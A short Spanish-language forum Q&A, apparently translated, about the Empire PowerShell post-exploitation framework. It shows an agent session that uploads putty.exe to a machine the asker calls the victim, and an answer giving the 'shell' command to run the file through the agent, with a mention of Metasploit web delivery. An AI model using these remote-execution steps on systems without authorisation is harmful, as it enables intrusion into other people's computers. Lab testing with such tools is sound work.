Imperio probando los comandos de PowerShell

4

Estoy probando Empire Powershell.

Me preguntaba cómo puede ejecutar un archivo de forma remota después de subirlo a la máquina de la víctima.

(Empire: ANHGP22NCFLPVAAH) > cd Desktop
(Empire: ANHGP22NCFLPVAAH) > 
Path                   
----                   
C:\Users\Testpc\Desktop
(Empire: ANHGP22NCFLPVAAH) > upload /root/Testpc/putty.exe
(Empire: ANHGP22NCFLPVAAH) > cd Desktop
(Empire: ANHGP22NCFLPVAAH) > 
Path                   
----                   
C:\Users\Testpc\Desktop
(Empire: ANHGP22NCFLPVAAH) > dir
(Empire: ANHGP22NCFLPVAAH) > 
LastWriteTime      Length Name                                       
-------------      ------ ----                                       
11-1-2017 23:27:49    282 desktop.ini                                
20-2-2017 0:50:37  531368 putty.exe 
(Empire: ANHGP22NCFLPVAAH) > (what are the commands to remotly execute the putty.exe file)
    
pregunta alien187 20.02.2017 - 02:09
fuente

1 respuesta

1

Puedes usar el comando shell .

Desde la pantalla de ayuda:

  

shell: le pide a un agente que use un comando de shell.

En su caso, ejecutar putty.exe sería así:

(Empire: Win10Priv) > shell <pathtoputty>\putty.exe

También puedes hacer esto para ejecutar los comandos de entrega web Metasploit, de una forma más sencilla si migras de Empire a Msf.

    
respondido por el Carter Brainerd 20.04.2017 - 01:04
fuente

Lea otras preguntas en las etiquetas